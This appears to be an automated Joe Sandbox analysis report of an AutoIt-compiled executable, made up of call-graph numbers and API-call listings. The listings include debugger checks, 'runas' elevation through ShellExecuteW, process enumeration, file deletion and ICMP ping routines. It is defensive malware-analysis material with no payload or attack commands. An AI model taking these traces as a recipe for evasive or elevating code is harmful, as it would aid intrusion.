103395 f205b2 5 API calls __Init_thread_wait 103221->103395 103224 f131ab 103224->103221 103394 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103224->103394 103225 f19f47 103225->103228 103396 f20568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103225->103396 103228->103141 103397 f889b6 103229->103397 103231 f8a00c 103231->103177 103234 f8a705 103232->103234 103237 f8a6c5 103232->103237 103233 f8a723 103233->103237 103238 f8a780 103233->103238 103556 f0c98d 39 API calls 103233->103556 103234->103233 103555 f0c98d 39 API calls 103234->103555 103237->103177 103523 f70372 103238->103523 103241 f08ec0 52 API calls 103240->103241 103242 f8ee4a 103241->103242 103243 f07ad5 8 API calls 103242->103243 103244 f8ee59 103243->103244 103245 f8ee8d 103244->103245 103612 f0c98d 39 API calls 103244->103612 103597 f081d6 103245->103597 103248 f8ee6a 103248->103245 103251 f8ee6f 103248->103251 103250 f0b329 8 API calls 103253 f8eea4 103250->103253 103252 f0bed9 8 API calls 103251->103252 103254 f8ee7f 103251->103254 103252->103254 103257 f8eecc 103253->103257 103258 f0bed9 8 API calls 103253->103258 103614 f07b1a 8 API calls 103254->103614 103256 f8ef8d 103256->103177 103259 f0bf73 8 API calls 103257->103259 103258->103257 103262 f8eef9 103259->103262 103260 f8ef30 103263 f07bb5 8 API calls 103260->103263 103265 f8ef4e 103260->103265 103262->103260 103600 f699ff 103262->103600 103606 f06a7c 103262->103606 103263->103260 103613 f0839a 8 API calls 103265->103613 103268 f8aa08 103267->103268 103274 f8a9c8 103267->103274 103269 f8aa26 103268->103269 103616 f0c98d 39 API calls 103268->103616 103272 f8aa8e 103269->103272 103269->103274 103617 f0c98d 39 API calls 103269->103617 103273 f70372 58 API calls 103272->103273 103273->103274 103274->103177 103276 f80fe1 103275->103276 103277 f8100f WSAStartup 103276->103277 103631 f0c98d 39 API calls 103276->103631 103278 f81054 103277->103278 103299 f81023 messages 103277->103299 103618 f1c1f6 
103278->103618 103281 f80ffc 103281->103277 103632 f0c98d 39 API calls 103281->103632 103283 f08ec0 52 API calls 103285 f81069 103283->103285 103623 f1f9d4 WideCharToMultiByte 103285->103623 103286 f8100b 103286->103277 103288 f81075 inet_addr gethostbyname 103289 f81093 IcmpCreateFile 103288->103289 103288->103299 103290 f810d3 103289->103290 103289->103299 103291 f2017b 8 API calls 103290->103291 103292 f810ec 103291->103292 103633 f0423c 103292->103633 103295 f8112b IcmpSendEcho 103297 f8114c 103295->103297 103296 f81102 IcmpSendEcho 103296->103297 103298 f81212 IcmpCloseHandle WSACleanup 103297->103298 103298->103299 103299->103177 103301 f08ec0 52 API calls 103300->103301 103302 f76662 103301->103302 103638 f6dc54 103302->103638 103304 f7666a 103305 f7666e GetLastError 103304->103305 103306 f76683 103304->103306 103305->103306 103306->103177 103309 f8a5c5 103307->103309 103308 f08ec0 52 API calls 103310 f8a632 103308->103310 103309->103308 103312 f8a5d4 103309->103312 103732 f718a9 103310->103732 103312->103177 103314 f889b6 119 API calls 103313->103314 103315 f89ff8 103314->103315 103315->103177 103317 f08ec0 52 API calls 103316->103317 103318 f1ac68 103317->103318 103773 f1bc58 103318->103773 103320 f1ac7f 103330 f1b09b _wcslen 103320->103330 103778 f0c98d 39 API calls 103320->103778 103322 f24d98 _strftime 40 API calls 103322->103330 103323 f07ad5 8 API calls 103323->103330 103324 f1bbbe 43 API calls 103324->103330 103325 f06c03 8 API calls 103325->103330 103328 f1b1fb 103328->103177 103329 f08ec0 52 API calls 103329->103330 103330->103322 103330->103323 103330->103324 103330->103325 103330->103328 103330->103329 103331 f0c98d 39 API calls 103330->103331 103332 f08577 8 API calls 103330->103332 103333 f0396b 60 API calls 103330->103333 103334 f03907 Shell_NotifyIconW 103330->103334 103779 f0ad40 8 API calls __fread_nolock 103330->103779 103780 f07b1a 8 API calls 103330->103780 103331->103330 103332->103330 103333->103330 103334->103330 103336 f08ec0 52 API 
calls 103335->103336 103337 f8ad63 103336->103337 103781 f6dd87 CreateToolhelp32Snapshot Process32FirstW 103337->103781 103339 f8ad72 103339->103177 103341 f87b38 103340->103341 103342 f87b52 103340->103342 103800 f73fe1 81 API calls __wsopen_s 103341->103800 103344 f860e6 8 API calls 103342->103344 103345 f87b5d 103344->103345 103346 f10340 205 API calls 103345->103346 103347 f87bc1 103346->103347 103348 f87c5c 103347->103348 103352 f87c03 103347->103352 103371 f87b4a 103347->103371 103349 f87cb0 103348->103349 103350 f87c62 103348->103350 103351 f08ec0 52 API calls 103349->103351 103349->103371 103801 f71ad8 8 API calls 103350->103801 103353 f87cc2 103351->103353 103357 f7148b 8 API calls 103352->103357 103355 f0c2c9 8 API calls 103353->103355 103358 f87ce6 CharUpperBuffW 103355->103358 103356 f87c85 103802 f0bd07 8 API calls 103356->103802 103360 f87c3b 103357->103360 103362 f87d00 103358->103362 103361 f12b20 205 API calls 103360->103361 103361->103371 103363 f87d53 103362->103363 103364 f87d07 103362->103364 103365 f08ec0 52 API calls 103363->103365 103368 f7148b 8 API calls 103364->103368 103366 f87d5b 103365->103366 103803 f1aa65 9 API calls 103366->103803 103369 f87d35 103368->103369 103370 f12b20 205 API calls 103369->103370 103370->103371 103371->103139 103372 f87d65 103372->103371 103373 f08ec0 52 API calls 103372->103373 103374 f87d80 103373->103374 103804 f0bd07 8 API calls 103374->103804 103376->103173 103377->103136 103379 f0b338 _wcslen 103378->103379 103380 f2017b 8 API calls 103379->103380 103381 f0b360 __fread_nolock 103380->103381 103382 f2014b 8 API calls 103381->103382 103383 f0b376 103382->103383 103383->103149 103384->103146 103385->103150 103386->103163 103387->103163 103388->103177 103389->103177 103390->103177 103391->103174 103392->103177 103393->103224 103394->103221 103395->103225 103396->103228 103398 f08ec0 52 API calls 103397->103398 103399 f889ed 103398->103399 103402 f88a32 messages 103399->103402 103435 f89730 103399->103435 
103401 f88aa6 103401->103402 103408 f08ec0 52 API calls 103401->103408 103422 f88cde 103401->103422 103467 f64ad3 8 API calls __fread_nolock 103401->103467 103468 f88f7a 41 API calls _strftime 103401->103468 103402->103231 103403 f88eac 103485 f89941 59 API calls 103403->103485 103404 f88cec 103448 f888e3 103404->103448 103407 f88ebb 103407->103404 103409 f88ec7 103407->103409 103408->103401 103409->103402 103414 f88d25 103462 f1ffe0 103414->103462 103417 f88d5f 103470 f07e12 103417->103470 103418 f88d45 103469 f73fe1 81 API calls __wsopen_s 103418->103469 103421 f88d50 GetCurrentProcess TerminateProcess 103421->103417 103422->103403 103422->103404 103426 f88f22 103426->103402 103431 f88f36 FreeLibrary 103426->103431 103428 f88d9e 103482 f895d8 74 API calls 103428->103482 103431->103402 103433 f88daf 103433->103426 103483 f11ca0 8 API calls 103433->103483 103484 f0b4c8 8 API calls 103433->103484 103486 f895d8 74 API calls 103433->103486 103436 f0c2c9 8 API calls 103435->103436 103437 f8974b CharLowerBuffW 103436->103437 103487 f69805 103437->103487 103441 f0bf73 8 API calls 103442 f89787 103441->103442 103494 f0acc0 103442->103494 103444 f8979b 103445 f0adf4 8 API calls 103444->103445 103446 f897a5 _wcslen 103445->103446 103447 f898bb _wcslen 103446->103447 103506 f88f7a 41 API calls _strftime 103446->103506 103447->103401 103449 f88949 103448->103449 103450 f888fe 103448->103450 103454 f89af3 103449->103454 103451 f2017b 8 API calls 103450->103451 103452 f88920 103451->103452 103452->103449 103453 f2014b 8 API calls 103452->103453 103453->103452 103455 f89d08 messages 103454->103455 103456 f89b17 _strcat _wcslen ___std_exception_copy 103454->103456 103455->103414 103456->103455 103457 f0c98d 39 API calls 103456->103457 103458 f0c63f 39 API calls 103456->103458 103459 f0ca5b 39 API calls 103456->103459 103460 f08ec0 52 API calls 103456->103460 103510 f6f8c5 10 API calls _wcslen 103456->103510 103457->103456 103458->103456 103459->103456 103460->103456 103464 f1fff5 
103462->103464 103463 f2008d Sleep 103465 f2005b 103463->103465 103464->103463 103464->103465 103466 f2007b CloseHandle 103464->103466 103465->103417 103465->103418 103466->103465 103467->103401 103468->103401 103469->103421 103471 f07e1a 103470->103471 103472 f2014b 8 API calls 103471->103472 103473 f07e28 103472->103473 103511 f08445 103473->103511 103476 f08470 103514 f0c760 103476->103514 103478 f2017b 8 API calls 103480 f0851c 103478->103480 103479 f08480 103479->103478 103479->103480 103480->103433 103481 f11ca0 8 API calls 103480->103481 103481->103428 103482->103433 103483->103433 103484->103433 103485->103407 103486->103433 103488 f69825 _wcslen 103487->103488 103489 f69914 103488->103489 103490 f6985a 103488->103490 103493 f69919 103488->103493 103489->103441 103489->103446 103490->103489 103507 f1e36b 41 API calls 103490->103507 103493->103489 103508 f1e36b 41 API calls 103493->103508 103496 f0ace1 103494->103496 103505 f0accf 103494->103505 103495 f0acda __fread_nolock 103495->103444 103499 f50557 103496->103499 103500 f0ad07 103496->103500 103496->103505 103497 f0c2c9 8 API calls 103498 f505a3 __fread_nolock 103497->103498 103501 f2014b 8 API calls 103499->103501 103509 f088e8 8 API calls 103500->103509 103503 f50561 103501->103503 103504 f2017b 8 API calls 103503->103504 103504->103505 103505->103495 103505->103497 103506->103447 103507->103490 103508->103493 103509->103495 103510->103456 103512 f2014b 8 API calls 103511->103512 103513 f07e30 103512->103513 103513->103476 103515 f0c76b 103514->103515 103516 f51285 103515->103516 103520 f0c773 messages 103515->103520 103517 f2014b 8 API calls 103516->103517 103519 f51291 103517->103519 103518 f0c77a 103518->103479 103520->103518 103522 f0c7e0 8 API calls messages 103520->103522 103522->103520 103557 f702aa 103523->103557 103526 f703f3 103573 f705e9 56 API calls __fread_nolock 103526->103573 103527 f7040b 103529 f70471 103527->103529 103530 f7041b 103527->103530 103531 f70507 103529->103531 103532 
f704a1 103529->103532 103547 f70399 __fread_nolock 103529->103547 103554 f70453 103530->103554 103574 f72855 10 API calls 103530->103574 103533 f705b0 103531->103533 103534 f70510 103531->103534 103535 f704a6 103532->103535 103536 f704d1 103532->103536 103533->103547 103582 f0c63f 39 API calls 103533->103582 103537 f70515 103534->103537 103538 f7058d 103534->103538 103535->103547 103577 f0ca5b 39 API calls 103535->103577 103536->103547 103578 f0ca5b 39 API calls 103536->103578 103540 f70554 103537->103540 103541 f7051b 103537->103541 103538->103547 103581 f0c63f 39 API calls 103538->103581 103540->103547 103580 f0c63f 39 API calls 103540->103580 103541->103547 103579 f0c63f 39 API calls 103541->103579 103547->103237 103549 f70427 103575 f72855 10 API calls 103549->103575 103552 f7043e __fread_nolock 103576 f72855 10 API calls 103552->103576 103564 f71844 103554->103564 103555->103233 103556->103238 103558 f702f7 103557->103558 103562 f702bb 103557->103562 103593 f0c98d 39 API calls 103558->103593 103559 f702f5 103559->103526 103559->103527 103559->103547 103561 f08ec0 52 API calls 103561->103562 103562->103559 103562->103561 103583 f24d98 103562->103583 103565 f7184f 103564->103565 103566 f2014b 8 API calls 103565->103566 103567 f71856 103566->103567 103568 f71883 103567->103568 103569 f71862 103567->103569 103571 f2017b 8 API calls 103568->103571 103570 f2017b 8 API calls 103569->103570 103572 f7186b ___scrt_fastfail 103570->103572 103571->103572 103572->103547 103573->103547 103574->103549 103575->103552 103576->103554 103577->103547 103578->103547 103579->103547 103580->103547 103581->103547 103582->103547 103584 f24da6 103583->103584 103585 f24e1b 103583->103585 103589 f24dcb 103584->103589 103594 f2f649 20 API calls _abort 103584->103594 103596 f24e2d 40 API calls 4 library calls 103585->103596 103588 f24e28 103588->103562 103589->103562 103590 f24db2 103595 f32b5c 26 API calls __wsopen_s 103590->103595 103592 f24dbd 103592->103562 103593->103559 
103594->103590 103595->103592 103596->103588 103598 f0bf73 8 API calls 103597->103598 103599 f081de 103598->103599 103599->103250 103601 f69a0a 103600->103601 103603 f69a18 103600->103603 103602 f0adf4 8 API calls 103601->103602 103605 f69a16 103602->103605 103615 f08844 8 API calls __fread_nolock 103603->103615 103605->103262 103607 f06a8b 103606->103607 103611 f06aac __fread_nolock 103606->103611 103609 f2017b 8 API calls 103607->103609 103608 f2014b 8 API calls 103610 f06abf 103608->103610 103609->103611 103610->103262 103611->103608 103612->103248 103613->103254 103614->103256 103615->103605 103616->103269 103617->103272 103619 f2017b 8 API calls 103618->103619 103620 f1c209 103619->103620 103621 f2014b 8 API calls 103620->103621 103622 f1c215 103621->103622 103622->103283 103624 f1fa35 103623->103624 103625 f1f9fe 103623->103625 103637 f1fe8a 8 API calls 103624->103637 103627 f2017b 8 API calls 103625->103627 103628 f1fa05 WideCharToMultiByte 103627->103628 103636 f1fa3e 8 API calls __fread_nolock 103628->103636 103630 f1fa29 103630->103288 103631->103281 103632->103286 103634 f2014b 8 API calls 103633->103634 103635 f0424e 103634->103635 103635->103295 103635->103296 103636->103630 103637->103630 103639 f0bf73 8 API calls 103638->103639 103640 f6dc73 103639->103640 103641 f0bf73 8 API calls 103640->103641 103642 f6dc7c 103641->103642 103643 f0bf73 8 API calls 103642->103643 103644 f6dc85 103643->103644 103662 f05851 103644->103662 103649 f6dcab 103674 f0568e 103649->103674 103650 f06b7c 8 API calls 103650->103649 103652 f6dcbf FindFirstFileW 103653 f6dd4b FindClose 103652->103653 103656 f6dcde 103652->103656 103658 f6dd56 103653->103658 103654 f6dd26 FindNextFileW 103654->103656 103655 f0bed9 8 API calls 103655->103656 103656->103653 103656->103654 103656->103655 103657 f07bb5 8 API calls 103656->103657 103659 f06b7c 8 API calls 103656->103659 103657->103656 103658->103304 103660 f6dd17 DeleteFileW 103659->103660 103660->103654 103661 f6dd42 FindClose 
103660->103661 103661->103658 103716 f422d0 103662->103716 103665 f05898 103722 f0bd57 103665->103722 103666 f0587d 103667 f08577 8 API calls 103666->103667 103669 f05889 103667->103669 103718 f055dc 103669->103718 103672 f6eab0 GetFileAttributesW 103673 f6dc99 103672->103673 103673->103649 103673->103650 103675 f0bf73 8 API calls 103674->103675 103676 f056a4 103675->103676 103677 f0bf73 8 API calls 103676->103677 103678 f056ac 103677->103678 103679 f0bf73 8 API calls 103678->103679 103680 f056b4 103679->103680 103681 f0bf73 8 API calls 103680->103681 103682 f056bc 103681->103682 103683 f056f0 103682->103683 103684 f44da1 103682->103684 103686 f0acc0 8 API calls 103683->103686 103685 f0bed9 8 API calls 103684->103685 103687 f44daa 103685->103687 103688 f056fe 103686->103688 103690 f0bd57 8 API calls 103687->103690 103689 f0adf4 8 API calls 103688->103689 103691 f05708 103689->103691 103692 f05733 103690->103692 103691->103692 103693 f0acc0 8 API calls 103691->103693 103694 f05754 103692->103694 103709 f05778 103692->103709 103713 f44dcc 103692->103713 103696 f05729 103693->103696 103694->103709 103728 f0655e 103694->103728 103695 f0acc0 8 API calls 103700 f05789 103695->103700 103697 f0adf4 8 API calls 103696->103697 103697->103692 103699 f08577 8 API calls 103712 f44e8c 103699->103712 103702 f0579f 103700->103702 103704 f0bed9 8 API calls 103700->103704 103701 f057b3 103705 f057be 103701->103705 103708 f0bed9 8 API calls 103701->103708 103702->103701 103707 f0bed9 8 API calls 103702->103707 103704->103702 103710 f0bed9 8 API calls 103705->103710 103714 f057c9 103705->103714 103706 f0acc0 8 API calls 103706->103709 103707->103701 103708->103705 103709->103695 103710->103714 103711 f0655e 8 API calls 103711->103712 103712->103709 103712->103711 103731 f0ad40 8 API calls __fread_nolock 103712->103731 103713->103699 103714->103652 103717 f0585e GetFullPathNameW 103716->103717 103717->103665 103717->103666 103719 f055ea 103718->103719 103720 f0adf4 8 API calls 
103719->103720 103721 f055fe 103720->103721 103721->103672 103723 f0bd71 103722->103723 103727 f0bd64 103722->103727 103724 f2014b 8 API calls 103723->103724 103725 f0bd7b 103724->103725 103726 f2017b 8 API calls 103725->103726 103726->103727 103727->103669 103729 f0c2c9 8 API calls 103728->103729 103730 f05761 103729->103730 103730->103706 103730->103709 103731->103712 103733 f718b6 103732->103733 103734 f2014b 8 API calls 103733->103734 103735 f718bd 103734->103735 103738 f6fcb5 103735->103738 103737 f718f7 103737->103312 103739 f0c2c9 8 API calls 103738->103739 103740 f6fcc8 CharLowerBuffW 103739->103740 103741 f6fcdb 103740->103741 103742 f6fd19 103741->103742 103743 f0655e 8 API calls 103741->103743 103755 f6fce5 ___scrt_fastfail 103741->103755 103744 f6fd2b 103742->103744 103745 f0655e 8 API calls 103742->103745 103743->103741 103746 f2017b 8 API calls 103744->103746 103745->103744 103749 f6fd59 103746->103749 103751 f6fd7b 103749->103751 103771 f6fbed 8 API calls 103749->103771 103750 f6fdb8 103752 f2014b 8 API calls 103750->103752 103750->103755 103756 f6fe0c 103751->103756 103753 f6fdd2 103752->103753 103754 f2017b 8 API calls 103753->103754 103754->103755 103755->103737 103757 f0bf73 8 API calls 103756->103757 103758 f6fe3e 103757->103758 103759 f0bf73 8 API calls 103758->103759 103760 f6fe47 103759->103760 103761 f0bf73 8 API calls 103760->103761 103763 f6fe50 103761->103763 103762 f70114 103762->103750 103763->103762 103764 f08577 8 API calls 103763->103764 103765 f266f8 GetStringTypeW 103763->103765 103766 f0ad40 8 API calls 103763->103766 103768 f26641 39 API calls 103763->103768 103769 f6fe0c 40 API calls 103763->103769 103770 f0bed9 8 API calls 103763->103770 103772 f26722 GetStringTypeW _strftime 103763->103772 103764->103763 103765->103763 103766->103763 103768->103763 103769->103763 103770->103763 103771->103749 103772->103763 103774 f2014b 8 API calls 103773->103774 103775 f1bc65 103774->103775 103776 f0b329 8 API calls 103775->103776 103777 

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00F05FF7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00F9DC2C,00000000,?,?), ref: 00F06123
                                                                                                                                                                                                                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F0612A
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F06155
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F06167
                                                                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F06175
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F0617C
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00F061A1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                        • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c27e0266e1f16b10a6e5217b54aa5117cd881864a1dbe44c65e6da116ac3816
                                                                                                                                                                                                                                                                                        • Instruction ID: add275f51f49a30c7ad1afd99c2ab2a94af65bd95fc3a7e550962c57f78f4d31
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c27e0266e1f16b10a6e5217b54aa5117cd881864a1dbe44c65e6da116ac3816
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BA1913290B2CCCFC796DBBCBC412993FA66B76704B18489BD48197262C66D4548FBF1

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F03368,?), ref: 00F033BB
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F03368,?), ref: 00F033CE
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00FD2418,00FD2400,?,?,?,?,?,?,00F03368,?), ref: 00F0343A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03462,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F042A0
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F034BB
                                                                                                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00F43CB0
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00FD2418,?,?,?,?,?,?,?,00F03368,?), ref: 00F43CF1
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FC31F4,00FD2418,?,?,?,?,?,?,?,00F03368), ref: 00F43D7A
                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00F43D81
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: GetSysColorBrush.USER32(0000000F), ref: 00F034DE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadCursorW.USER32(00000000,00007F00), ref: 00F034ED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(00000063), ref: 00F03503
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(000000A4), ref: 00F03515
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadIconW.USER32(000000A2), ref: 00F03527
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F0353F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F034D3: RegisterClassExW.USER32(?), ref: 00F03590
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F035E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03602
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F03616
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00F03368,?), ref: 00F0361F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F03A3C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00F43CAA
                                                                                                                                                                                                                                                                                        • AutoIt, xrefs: 00F43CA5
                                                                                                                                                                                                                                                                                        • runas, xrefs: 00F43D75
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                        • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f393eaae142798e7cc194d00a9acdb826a55acb68560dd9cf24e6012cefb4ac
                                                                                                                                                                                                                                                                                        • Instruction ID: 91e2726aa5e1bb47c69e1c573edfec58f330107f381701b0746d588a3bea5552
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f393eaae142798e7cc194d00a9acdb826a55acb68560dd9cf24e6012cefb4ac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D512771508349AAD711EF709D01D6E7FB9AB95350F04042EF981961E3CB288649F7A3

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F6DCCB
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DD1B
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F6DD2C
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6DD43
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6DD4C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b402ef1956cd3c710c20fd915b1bda09214941872c4d56fd784ff6c2d2fd2d7
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e8b4314a50cf062c332fa31c5ad4155d15a0cd26583c10abd9f25855a5431fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b402ef1956cd3c710c20fd915b1bda09214941872c4d56fd784ff6c2d2fd2d7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE314B31409349ABC310EB64CD859AFB7E8AE96310F404A5DF8D5831D1EB25DA09FB66
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6DDAC
                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00F6DDBA
                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00F6DDDA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F6DE87
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
